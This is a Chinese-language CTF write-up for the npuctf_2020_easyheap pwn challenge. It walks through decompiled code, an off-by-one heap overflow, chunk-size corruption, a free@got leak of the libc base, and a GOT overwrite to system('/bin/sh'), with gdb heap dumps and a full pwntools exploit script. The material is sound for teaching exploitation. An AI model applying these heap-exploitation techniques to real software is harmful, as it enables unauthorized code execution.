OFF-BY-ONE 例题分析

npuctf_2020_easyheap

题目提示 ubuntu18.04 版本,高版本 libc 2.27 tcachebin attack( tcache poisoning )

1772455957999-286e8341-a0bd-4c91-a28d-f45ab82d81d4.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  while ( 1 )
  {
    menu();
    read(0, buf, 4u);
    switch ( atoi(buf) )
    {
      case 1:
        create();
        break;
      case 2:
        edit();
        break;
      case 3:
        show();
        break;
      case 4:
        delete();
        break;
      case 5:
        exit(0);
      default:
        puts("Invalid Choice");
        break;
    }
  }
}
1772456496973-93cf49f4-8a45-42a9-92a6-62be5b79ee4e.png

create():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
unsigned __int64 create()
{
  __int64 v0; // rbx
  int n9; // [rsp+4h] [rbp-2Ch]
  size_t size; // [rsp+8h] [rbp-28h]
  char buf[8]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  for ( n9 = 0; n9 <= 9; ++n9 )
  {
    if ( !*((_QWORD *)&heaparray + n9) )
    {
      *((_QWORD *)&heaparray + n9) = malloc(0x10u);
      if ( !*((_QWORD *)&heaparray + n9) )
      {
        puts("Allocate Error");
        exit(1);
      }
      printf("Size of Heap(0x10 or 0x20 only) : ");
      read(0, buf, 8u);
      size = atoi(buf);
      if ( size != 24 && size != 56 )
        exit(-1);
      v0 = *((_QWORD *)&heaparray + n9);
      *(_QWORD *)(v0 + 8) = malloc(size);
      if ( !*(_QWORD *)(*((_QWORD *)&heaparray + n9) + 8LL) )
      {
        puts("Allocate Error");
        exit(2);
      }
      **((_QWORD **)&heaparray + n9) = size;
      printf("Content:");
      read_input(*(_QWORD *)(*((_QWORD *)&heaparray + n9) + 8LL), size);
      puts("Done!");
      return __readfsqword(0x28u) ^ v5;
    }
  }
  return __readfsqword(0x28u) ^ v5;
}

这里就是创建一个新的堆,可以输入大小和内容,并且要求大小必须是 24 或者 56

edit():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
unsigned __int64 edit()
{
  int n0xA; // [rsp+0h] [rbp-10h]
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4u);
  n0xA = atoi(buf);
  if ( (unsigned int)n0xA >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *((_QWORD *)&heaparray + n0xA) )
  {
    printf("Content: ");
    read_input(*(_QWORD *)(*((_QWORD *)&heaparray + n0xA) + 8LL), **((_QWORD **)&heaparray + n0xA) + 1LL);
    puts("Done!");
  }
  else
  {
    puts("How Dare you!");
  }
  return __readfsqword(0x28u) ^ v3;
}

第一个参数:(_QWORD )(((_QWORD )&heaparray + n0xA)+8LL)相当于*(heaparray[n0xA]+8)

第二个参数是第 n0xA 号堆块地址处存储的数值 +1,这个值就是 read_input 要读取的输入长度。

这里存在 off-by-one 漏洞。

show():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
unsigned __int64 show()
{
  int n0xA; // [rsp+0h] [rbp-10h]
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4u);
  n0xA = atoi(buf);
  if ( (unsigned int)n0xA >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *((_QWORD *)&heaparray + n0xA) )
  {
    printf(
      "Size : %ld\nContent : %s\n",
      **((_QWORD **)&heaparray + n0xA),
      *(const char **)(*((_QWORD *)&heaparray + n0xA) + 8LL));
    puts("Done!");
  }
  else
  {
    puts("How Dare you!");
  }
  return __readfsqword(0x28u) ^ v3;
}

输出写入的堆块的 content 地址(ptr+8)(_QWORD )(((_QWORD )&heaparray + n0xA)+8LL),

输出写入长度 → 堆块的 size + 1**((_QWORD **)&heaparray + n0xA)+1LL

delete():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
unsigned __int64 delete()
{
  int n0xA; // [rsp+0h] [rbp-10h]
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4u);
  n0xA = atoi(buf);
  if ( (unsigned int)n0xA >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *((_QWORD *)&heaparray + n0xA) )
  {
    free(*(void **)(*((_QWORD *)&heaparray + n0xA) + 8LL));
    free(*((void **)&heaparray + n0xA));
    *((_QWORD *)&heaparray + n0xA) = 0;
    puts("Done !");
  }
  else
  {
    puts("How Dare you!");
  }
  return __readfsqword(0x28u) ^ v3;
}

删除堆块,free 之后指针置 0,不存在 uaf 漏洞。python

exp 基本思路:

构造基本函数:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *

context.log_level = 'debug'
#p=process('./pwn')
p= remote('node5.buuoj.cn',29882)
elf=ELF('./pwn46')
libc = ELF("/home/kali/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so")
def add(size,content):
    p.sendlineafter('Your choice :',str(1))
    p.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
    p.sendlineafter('Content:',content)

def delete(idx):
    p.sendlineafter('Your choice :',str(4))
    p.sendlineafter('Index :',str(idx))

def show(idx):
    p.sendlineafter('Your choice :',str(3))
    p.sendlineafter('Index :',str(idx))

def edit(idx,content):
    p.sendlineafter('Your choice :',str(2))
    p.sendlineafter('Index :',str(idx))
    p.recvuntil("Content: ")
    p.send(content)

创建三个堆块:打个断点看一下堆情况
1
2
3
4
add(0x18,'pppp')         # chunk0
add(0x18,'pppp')         # chunk1
add(0x18,'/bin/sh\x00')  # chunk2
gdb.attach(p)
1772506512789-b8fdcd3f-a0a1-474d-837c-d86431ad9390.png

在每一次创建内容堆之前都会创建一个大小为 0x20 的堆。之后我们需要了解一下堆对齐原则:

glibc 堆的内存对齐规则:
  • 64 位系统下,堆块的大小必须是 16 字节对齐(即 size 是 16 的倍数)。
  • 每个堆块还包含 8 字节的 chunk 头(存储 size、标志位等),所以实际分配的 size = 申请大小 + 8(chunk 头),再向上对齐到 16 的倍数。
    • malloc(0x10) → 0x10 + 0x8 = 0x18 → 对齐到 0x20;
    • malloc(0x18) → 0x18 + 0x8 = 0x20 → 刚好对齐到 0x20。

也就是虽然我们分配的的 0x18 大小的堆,不过由于堆对齐原则,导致当前堆实际大小只有 0x10

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pwndbg> x/50gx 0x3aa0c250 
0x3aa0c250:     0x0000000000000000==>prev_size      0x0000000000000021|==>size
0x3aa0c260:     0x0000000000000018                  0x000000003aa0c280|==>data
0x3aa0c270:     0x0000000000000000==>chunk1         0x0000000000000021
0x3aa0c280:     0x0000000a70707070                  0x0000000000000000
0x3aa0c290:     0x0000000000000000                  0x0000000000000021
0x3aa0c2a0:     0x0000000000000018                  0x000000003aa0c2c0
0x3aa0c2b0:     0x0000000000000000                  0x0000000000000021
0x3aa0c2c0:     0x0000000a70707070  			    0x0000000000000000
0x3aa0c2d0:     0x0000000000000000 			        0x0000000000000021
0x3aa0c2e0:     0x0000000000000018 			        0x000000003aa0c300
0x3aa0c2f0:     0x0000000000000000 			        0x0000000000000021
0x3aa0c300:     0x0068732f6e69622f        			0x000000000000000a
0x3aa0c310:     0x0000000000000000    			    0x0000000000020cf1

6 次的 malloc 我们就先认为是创建了 chunk0~chunk5 吧

实现堆溢出,修改 chunk1 的 size 位:
edit(0,payload1)
1
2
3
4
5
6
7
payload1 = b'a'*0x18 + b'\x41'
edit(0,payload1) 
# gdb.attach(p)
delete(1)
payload2 = b'a'*0x10 + p64(0) + p64(0x21) + p64(0x02) + p64(elf.got['free'])
add(0x38,payload2)
gdb.attach(p)
1772507533201-ae1c6d77-e894-455a-a93f-e4839ee14036.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pwndbg> x/50gx 0x4e66250
0x4e66250: chunk0     0x0000000000000000      0x0000000000000021
0x4e66260: chunk0     0x0000000000000018      0x0000000004e66280
0x4e66270: chunk1     0x0000000000000000      0x0000000000000021
0x4e66280: chunk1     0x6161616161616161      0x6161616161616161
0x4e66290: chunk2     0x6161616161616161      0x0000000000000041|==>size
0x4e662a0: chunk2     0x0000000000000018      0x0000000004e662c0|==>data
0x4e662b0: chunk2     0x0000000000000000      0x0000000000000021|
0x4e662c0: chunk2     0x0000000a70707070      0x0000000000000000|
    
0x4e662d0:      0x0000000000000000      0x0000000000000021
0x4e662e0:      0x0000000000000018      0x0000000004e66300
0x4e662f0:      0x0000000000000000      0x0000000000000021
0x4e66300:      0x0068732f6e69622f      0x000000000000000a
0x4e66310:      0x0000000000000000      0x0000000000020cf1

在执行 delete(1) 前,你已经通过 edit(0,'a'*0x18+'\x41') 篡改了原先 chunk2 的 size 第 0 字节,此时:

  • 认为 chunk2 的大小为 0x40,1 表示正在使用,向下延伸 0x30 大小的全部变成 chunk2 的 data 区域
add(0x38,payload2)
1772508057187-897280e6-ef64-4d5f-954c-f6e89cc65e85.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> x/50gx 0x7e25250
0x7e25250:      0x0000000000000000      0x0000000000000021
0x7e25260:      0x0000000000000018      0x0000000007e25280
0x7e25270:      0x0000000000000000      0x0000000000000021
0x7e25280:      0x6161616161616161      0x6161616161616161

0x7e25290:  chunk2    0x6161616161616161      0x0000000000000041|==>size
0x7e252a0:  chunk2    0x6161616161616161      0x6161616161616161|==>data
0x7e252b0:  chunk2    0x0000000000000000      0x0000000000000021|
0x7e252c0:  chunk2    0x0000000000000002      0x0000000000602018|
0x7e252d0:      0x000000000000000a      0x0000000000000021
0x7e252e0:      0x0000000000000018      0x0000000007e25300
0x7e252f0:      0x0000000000000000      0x0000000000000021
0x7e25300:      0x0068732f6e69622f      0x000000000000000a
0x7e25310:      0x0000000000000000      0x0000000000020cf1
0x7e25320:      0x0000000000000000      0x0000000000000000

前面全部作为填充,保证在 data 的最后存放的是 free@got 表地址,方便 show(1)打印出来地址。

寻找 libc 基地址:
1
2
3
4
show(1)
p.recvuntil('Content : ')
libcbase=u64(p.recvuntil(b'\x7f').ljust(8,b'\x00'))-libc.symbols['free']
system_addr=libcbase+libc.symbols['system']

打印出来 free@got 地址,通过 libc 计算偏移找到 system 函数地址

调用 system(“/bin/sh”)获取 shell
1
2
3
4
5
edit(1,p64(system_addr))
# gdb.attach(p)
delete(2)
gdb.attach(p)
p.interactive()
1772508544236-8d422a42-1617-4a43-9237-23f7ade23711.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
pwndbg> x/50gx 0x7c0250  
0x7c0250: 0      0x0000000000000000      0x0000000000000021
0x7c0260: 0      0x0000000000000018      0x00000000007c0280
0x7c0270: 1      0x0000000000000000      0x0000000000000021
0x7c0280: 1      0x6161616161616161      0x6161616161616161
0x7c0290: 2      0x6161616161616161      0x0000000000000041
0x7c02a0: 2      0x6161616161616161      0x6161616161616161
0x7c02b0: 2      0x0000000000000000      0x0000000000000021
0x7c02c0: 2      0x0000000000000002      0x0000000000602018
0x7c02d0: 3      0x000000000000000a      0x0000000000000021
0x7c02e0: 3      0x0000000000000018      0x00000000007c0300==>binsh
0x7c02f0: 4      0x0000000000000000      0x0000000000000021
0x7c0300: 4      0x0068732f6e69622f==>system_addr      0x000000000000000a
0x7c0310:        0x0000000000000000      0x0000000000020cf1

0x1b35e300 就是 0x07c0300 的位置,重新调试了一下地址会变化。

1772509415853-b5232d3a-1d22-4fad-87e5-4e36b89abe45.png

最终成功获取 flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from pwn import *

context.log_level = 'debug'
p = process('./pwn466')
# p= remote('node5.buuoj.cn',29882)
elf=ELF('./pwn466')
libc = ELF("/home/kali/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so")
def add(size,content):
    p.sendlineafter('Your choice :',str(1))
    p.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
    p.sendlineafter('Content:',content)

def delete(idx):
    p.sendlineafter('Your choice :',str(4))
    p.sendlineafter('Index :',str(idx))

def show(idx):
    p.sendlineafter('Your choice :',str(3))
    p.sendlineafter('Index :',str(idx))

def edit(idx,content):
    p.sendlineafter('Your choice :',str(2))
    p.sendlineafter('Index :',str(idx))
    p.recvuntil("Content: ")
    p.send(content)

add(0x18,'pppp')
# gdb.attach(p)
add(0x18,'pppp')
# gdb.attach(p)
add(0x18,'/bin/sh\x00')
#gdb.attach(p)
edit(0,'a'*0x18+'\x41')
# gdb.attach(p)
delete(1)

payload=b'a'*0x10+p64(0)+p64(0x21)+p64(0x02)+p64(elf.got['free'])
add(0x38,payload)
# gdb.attach(p)
show(1)

p.recvuntil('Content : ')
libcbase=u64(p.recvuntil(b'\x7f').ljust(8,b'\x00'))-libc.symbols['free']
system_addr=libcbase+libc.symbols['system']
print(f"system_is: {hex(system_addr)}")

edit(1,p64(system_addr))
# gdb.attach(p)
delete(2)

# gdb.attach(p)

p.interactive()

更新: 2026-04-23 16:04:52
原文: https://www.yuque.com/idcm/wnemg9/qe5aq4ay2x1meow5